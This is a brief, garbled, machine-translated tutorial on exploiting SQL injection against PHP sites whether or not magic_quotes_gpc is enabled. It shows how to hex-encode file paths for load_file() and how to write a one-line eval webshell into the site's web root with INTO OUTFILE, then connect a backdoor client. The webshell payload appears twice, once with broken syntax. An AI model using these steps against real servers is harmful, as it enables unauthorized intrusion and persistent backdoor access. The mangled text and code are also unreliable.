php.ini (php config file) in MAGIC_QUOTES_GPC

The role of MAGIC_QUOTES_GPC in 1.php.ini (php config file ) : Passing $_get,$_post,$_ whether a single quotation mark is processed when a COOKIE is requested (a single quotation mark is translated with a backslash, such as \' so that a malicious request with single quotation marks cannot be executed), and if the target is turned on when injected, then we cannot write the file to the server by injecting the point ( SQl statement does not execute successfully)

2.POST Type one sentence trojan,<?php eval ($_post[cmd)]:?> (eval () function is basically php version )

3. if The MAGIC_QUOTES_GPC is closed , it can be used directly in the load_file () "and change the physical path of the site to \

Example load_file (C:\A\B\C.php) is changed to load_file (' c:/a/b/c.php '). But if magic_quotes_gpc is open, convert the physical path of the Web site to hexadecimal and put it directly in load_file () without single quotes. This way you can also know whether the magic_quotes_gpc of the website is open.

4 After reading the configuration file, you can write a word trojan into the server: in the display bit ' <?php eval ($_post[cmd]);? > ' +into outfile+ ' website physical path root directory +/ add new Table '. (If the server is Linux , the root of the site may be the current user is not writable permission is not enough, then you may have to find an uploaded directory, other users will generally have permissions, or find other can put the picture is also possible.) )

5, with post Type a word trojan client (lanker word PHP Backdoor client ) upload the back door.

php.ini (php config file) in MAGIC_QUOTES_GPC